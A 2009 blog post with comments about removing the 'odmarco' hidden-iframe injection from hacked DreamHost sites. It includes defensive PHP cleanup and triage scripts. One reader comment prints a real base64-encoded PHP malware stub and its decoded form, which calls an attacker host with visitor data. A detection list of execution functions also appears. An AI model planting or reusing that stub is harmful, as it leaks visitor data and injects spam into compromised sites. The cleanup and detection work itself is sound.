Cleaning "infected" file from the odmarco string
I use DreamHost for quite a few sites, both my own and friends'. Recently I was informed that one of my sites was triggering a warning in anti-virus software, and when I went to investigate, it turned out that quite a few sites had been hit by an annoying script that inserts a hidden iframe. Removing all of those by hand would be a tedious job, so I decided to automate it. Given that I don't know much shell scripting but have a firm knowledge of PHP, I decided to give that a go.
First of all, let's look at the hack. At this point I am unsure what exactly caused so many of my files to contain the odmarco string. It looks like quite a few people on DreamHost got hit by this problem, so I am guessing a vulnerable script on one of their servers caused it. I should blame myself as well, though, because apparently I hadn't noticed that a lot of files in my websites were writable by the server. It's no excuse, but a lot of the sites I have are very old, from a time when I definitely didn't pay as much attention to such details as I do now.
Anyway, from a comment on SiteAdvisor I learned that the script called in the iframe tries to abuse an exploit in Adobe Acrobat. Though I hate all stuff like this, I hate exploits more than mere referrer spam injection, so I felt I needed to take care of this quickly, even if a lot of the sites are hardly maintained anymore. So I sat down to hack up a little PHP script that would remove the offending string. Why PHP? Simple: it's the only language I know well enough to hack something like this up in a short time.
After some hacking around I came up with this script. It's not perfect, but it does the job and it does it well, so I'm happy. Anyone interested, feel free to use this script to clear up the mess in your site. It's meant to be run from the command line, inside the directory that you want to (recursively) clean. What I did was put it in the homedir on DreamHost, and then go into a directory that needed cleaning and issue the command:
/usr/local/php5/bin/php ../clear_odmarco.php
As you may notice, at DreamHost you need to explicitly specify the php5 path because, for some reason, the "php" command still defaults to php4. Then I put in a relative path to the clear_odmarco.php file (you could use the full path if you want).
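The original clear_odmarco.php is no longer downloadable, so here is a cleaner written for this page in the same spirit; it is an added example, not the author's script. It walks the current directory recursively, strips the injected hidden iframe together with the line break the injection leaves behind (a stray blank line at the top of a PHP file is sent as output and breaks later session_start() and header() calls), keeps a copy of every modified file in a backup directory that should live outside the web root, and refuses to run under the web server so the cleaner itself never becomes a browsable script. The marker string "odmarco", the list of file extensions and the backup location are assumptions to adjust to what you actually find in your files.

```php
<?php
// Added example for this page, not the author's clear_odmarco.php.
// Usage: /usr/local/php5/bin/php clean_iframe.php [--dry-run] [directory] [backup_dir]
// Run it over ssh from the directory to clean; --dry-run only lists what would change.

define('INJECTION_MARKER', 'odmarco');   // assumption: the injected tag contains this string

// Match the opening tag, an optional empty closing tag and the trailing line break, so a
// cleaned PHP file does not start with a blank line (stray output breaks session_start()).
function injection_pattern() {
    return '~<iframe\b[^>]*' . preg_quote(INJECTION_MARKER, '~') .
           '[^>]*>(?:\s*</iframe>)?[ \t]*\r?\n?~i';
}

// Return the cleaned content, or null when the file contains no injection.
function clean_content($content) {
    $count = 0;
    $cleaned = preg_replace(injection_pattern(), '', $content, -1, $count);
    return ($cleaned === null || $count === 0) ? null : $cleaned;
}

// Save the original under a flattened name in $backup_dir. Keep that directory outside the
// web root, otherwise the infected copy (and any PHP source in it) stays reachable over HTTP.
function backup_copy($path, $content, $backup_dir) {
    if (!is_dir($backup_dir) && !mkdir($backup_dir, 0700, true)) {
        return false;
    }
    $name = str_replace(array('/', '\\', ':'), '__', trim($path, './\\')) . '.bak';
    return file_put_contents($backup_dir . '/' . $name, $content) !== false;
}

function clean_tree($root, $backup_dir, $dry_run) {
    $report = array('scanned' => 0, 'infected' => 0, 'cleaned' => 0, 'failed' => array());
    $extensions = array('php', 'html', 'htm', 'tpl', 'inc', 'js');   // assumption
    $iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root));
    foreach ($iter as $path => $file) {
        if (!$file->isFile()) {
            continue;
        }
        if (!in_array(strtolower(pathinfo($path, PATHINFO_EXTENSION)), $extensions, true)) {
            continue;
        }
        $report['scanned']++;
        $content = @file_get_contents($path);
        if ($content === false) {
            $report['failed'][] = $path;
            continue;
        }
        $cleaned = clean_content($content);
        if ($cleaned === null) {
            continue;
        }
        $report['infected']++;
        if ($dry_run) {
            echo "would clean: $path\n";
            continue;
        }
        // Back up first; a file the server cannot write is reported, not silently skipped.
        if (($backup_dir !== null && !backup_copy($path, $content, $backup_dir))
                || !is_writable($path) || file_put_contents($path, $cleaned) === false) {
            $report['failed'][] = $path;
            continue;
        }
        $report['cleaned']++;
        echo "cleaned: $path\n";
    }
    return $report;
}

if (PHP_SAPI !== 'cli') {
    die("Run this over ssh from the command line, not through the web server.\n");
}
$args = array_slice($_SERVER['argv'], 1);
$dry_run = in_array('--dry-run', $args, true);
$args = array_values(array_diff($args, array('--dry-run')));
$root = isset($args[0]) ? $args[0] : getcwd();
$backup_dir = isset($args[1]) ? $args[1] : null;
$report = clean_tree($root, $backup_dir, $dry_run);
printf("scanned %d, infected %d, cleaned %d, failed %d\n", $report['scanned'],
       $report['infected'], $report['cleaned'], count($report['failed']));
foreach ($report['failed'] as $path) {
    echo "FAILED: $path\n";
}
```

Run it once with --dry-run to see which files match before letting it write anything. Removing the iframe only treats the symptom: the files were modified because the server could write to them, so after cleaning, tighten the permissions on the affected directories and look for anything else the same access may have left behind.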
April 12, 2009 - tags: odmarco, script, virus, malware, clear, dreamhost, php
Comments
Silvano Girardi Jr.: I had the same problem too. But it wasn't only the iframe, which for me was pointing to google- stats.com instead.
I posted about it on my blog, but it is in portuguese: http://www.silvano.pro.br/2009/04/10/recomeco/
Let me list these items in English here:
1 - the hidden frame
2 - .htaccess modified to redirect all search engine bots to the cracker's website
3 - malicious PHP code generating random links
eval(base64_decode('JGNoPWN1cmxfaW5pdCgiaHR0cDovL3Vzci01Mi5hZHNsLm1kL2lu
YzIucGhwP2hvc3Q9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJmlwP
SIudXJsZW5jb2RlKCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKS4iJmFnZW50PSIudXJsZW
5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpOyBjdXJsX3NldG9wdCgkY2gs
IENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7ICRyZXN1bHQ9Y3VybF9leGVjKCRjaCk7
IGN1cmxfY2xvc2UoJGNoKTsgcHJpbnQgJHJlc3VsdDs='));
the decode results in:
$ch=curl_init("http://usr-52. adsl .md/inc2.php?host=".urlencode($_SERVER["HTTP_HOST"])."&ip=".urlencode($_SERVER["REMOTE_ADDR"])."&agent=".urlencode($_SERVER["HTTP_USER_AGENT"])); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec($ch); curl_close($ch); print $result;
4 - lots of pages modified with the malicious code on the top
The variable name and value changes for every file.
5 - there was a wp-content/cache.php file, which was actually a php shell called r57shell
6 - there was a big binary file called "core" which I didn't know what it was about.
There were probably more changes, so I decided to get rid of just everything and start from scratch.
Btw, I lost my pagerank too
Regards
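Item 3 in the comment above is the classic eval(base64_decode('...')) dropper. As an added example (not Silvano's code and not the post author's script), here is a triage script that finds such stubs below a directory, decodes each blob with strict base64 checking and flags phone-home or command-execution indicators, without ever passing the payload to eval(). The indicator list and the example.invalid sample stub are constructed for this example.

```php
<?php
// Added example, not code from the post or its comments: locate eval(base64_decode('...'))
// stubs, decode the blob for review and flag suspicious indicators. Payloads are printed,
// never executed.
// Usage: /usr/local/php5/bin/php find_eval_b64.php [directory]

define('EVAL_B64_PATTERN',
    '~eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=\s]+)[\'"]\s*\)\s*\)~');

// Return the decoded payloads found in $source, in order; null marks an undecodable blob.
function extract_encoded_payloads($source) {
    $payloads = array();
    if (preg_match_all(EVAL_B64_PATTERN, $source, $matches)) {
        foreach ($matches[1] as $blob) {
            // Blobs are often wrapped across lines; strict mode rejects anything else odd.
            $decoded = base64_decode(preg_replace('~\s+~', '', $blob), true);
            $payloads[] = ($decoded === false) ? null : $decoded;
        }
    }
    return $payloads;
}

// Substrings that usually mean the payload phones home or runs commands
// (constructed list; extend it with what you see in your own findings).
function suspicious_indicators($payload) {
    $needles = array('curl_init', 'file_get_contents', 'fsockopen', 'http://', 'https://',
                     '$_SERVER', 'system(', 'exec(', 'shell_exec(', 'passthru(');
    $hits = array();
    foreach ($needles as $needle) {
        if (strpos($payload, $needle) !== false) {
            $hits[] = $needle;
        }
    }
    return $hits;
}

// Scan every .php file below $root and collect (file, payload, indicators) findings.
function scan_tree($root) {
    $findings = array();
    $iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root));
    foreach ($iter as $path => $file) {
        if (!$file->isFile() || strtolower(pathinfo($path, PATHINFO_EXTENSION)) !== 'php') {
            continue;
        }
        $source = @file_get_contents($path);
        if ($source === false) {
            continue;
        }
        foreach (extract_encoded_payloads($source) as $payload) {
            $findings[] = array(
                'file'       => $path,
                'payload'    => $payload,
                'indicators' => ($payload === null) ? array() : suspicious_indicators($payload),
            );
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample stub, encoded at runtime so the blob is known and harmless
    // (example.invalid is a reserved domain that never resolves).
    $sample_payload = '$ch=curl_init("http://example.invalid/inc2.php?host=".urlencode($_SERVER["HTTP_HOST"])); print curl_exec($ch);';
    $sample_file = "<?php eval(base64_decode('" . base64_encode($sample_payload) . "')); ?>\n";
    $decoded = extract_encoded_payloads($sample_file);
    echo "sample decodes to: " . $decoded[0] . "\n";
    echo "indicators: " . implode(', ', suspicious_indicators($decoded[0])) . "\n";

    if (isset($_SERVER['argv'][1])) {
        foreach (scan_tree($_SERVER['argv'][1]) as $finding) {
            echo $finding['file'] . "\n  " .
                 ($finding['payload'] === null ? '[undecodable base64]' : $finding['payload']) . "\n";
            if ($finding['indicators']) {
                echo "  indicators: " . implode(', ', $finding['indicators']) . "\n";
            }
        }
    }
}
```

The pattern only catches the direct eval(base64_decode('...')) form; variants that first assign the blob to a variable with a changing name, as Silvano describes, need the pattern extended. Decoded output is the thing to read: a payload that builds a URL from $_SERVER values and prints whatever it fetches is the injected-links behaviour from item 3.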
GIF_Tom: Hi, we seem to be having the same problem over here with Odmarco and Dream Host. Funny enough when we asked them for support they directed us to your site.
We downloaded the script but we seem to be having trouble executing it. Can you dumb down your explanation for us novice folks. Thanks so much!
left: Hi GIF_Tom,
Could you explain what problems you are having? Any errors? Or what exactly is unclear? I'd be glad to help you. Feel free to e-mail me via the 'who' option in the menu
Stefan

Bill: You can scrub the iframe from HTML files quickly from the command line with this one-liner.
find . -name '*.html' -print0 | xargs -0 perl -pi -e 'undef $/; s#
GIF_Tom: Hi Left, I went ahead and wrote you an email further explaining my issues. Just wanted to check in and see if you received it. It was very detailed. Any help you can give me on this subject will be great. If you did not receive it let me know and I will repost it in the comment field.
GIF_Tom
lucia: Thank you, thank you, thank you.
Odmarco changed the name of their image. So, I changed the string to be eliminated and named the script "nameofscript.com".
Then, I loaded the script to my top directory, and ran "http://mydomain.com/nameofscript.php" This worked like a charm. Even the command line averse can do it.
Chris Ramsey: You sir, are a life saver. As a PHP developer I should have thought about writing a script to do this but it never crossed my mind.
Thanks so much for this!

Jack: Hi,
This is a fantastic little script, thank you ever so much for this! It worked on 4 websites I have hosted with DreamHost but one gave me this error:
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /home/promotions7/domainnamehere.com/clear_odmarco.php on line 7
I think it may be something to do with php4/php5 but I'm not sure how to specify the path for php5. If you could help I would be most grateful.
Many Thanks
Jack
left: Hi Jack,
The error does look very much php4/php5 related. You can specify it to run php5 by using the full path as I mentioned it in my article (/usr/local/php5/bin/php)
Stefan

Jack: Hi Stefan,
Thanks for the quick response. I should have mentioned that I was unable to get the script to work via a custom command from my FTP client (FileZilla) as it kept reporting "500 /USR/LOCAL/PHP5/BIN/PHP not understood".
I managed to enter the script into the directory and then run it via my browser "http://mydomainhere.com/clear_odmarco.php". This worked fine on all of my other sites! What am I doing wrong?
After being hit first in April I was hit once again last night... what a pest! Thank goodness for your post...
Kind Regards
- Jack
left: The script is meant to be run using an ssh connection into the server. Via FTP this will not work. If you run it via the browser, the problem will probably be related to the fact that your domain runs php4.
Try connecting through ssh (using a client such as PuTTY for Windows). Be careful with what you do, obviously. The instructions above should suffice once you connect through ssh.

Dinesh: Hi,
The link to the script file is broken. Can I please have the file. I have the same problem too and I'm on DH.

Dinesh: Ah well, never mind... I found the script in Google's cache...
Gordon: The CORE file is not a virus. It is part of Dreamhost's automation system!!! Do not mess with it!!!
----------------------
Thank you for this script.
I saw that your code link is dead, here's a link to a modified version I used to clean up an attack on Dreamhost (6/22/09):
http://forum.animejutsu.com/index.php?topic=116.0

Mik: Hi, good job on writing a script to help sort this out. Unfortunately the link to the script still seems to be broken...
Mik.
Tim Eash: One of our sites was attacked with this "odmarco" infection; it is running osCommerce. I was able to use the script from the site and executed it, and it works almost without flaw. However, I am having a problem cleaning out the 4000 files, because when the script cleans, it leaves behind "white spaces".
What I mean by white spaces is, I believe, line breaks. I am not sure. If I open the cleaned file with Notepad I see "a square", but if I use an HTML editor to open it up, I see a newline.
But the new line is causing a problem because it's considered "output" and so my session is jacked.
"Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent"
Any ideas as to how I can scrub the infection and not leave a newline at the top of each script?
Thanks,
Tim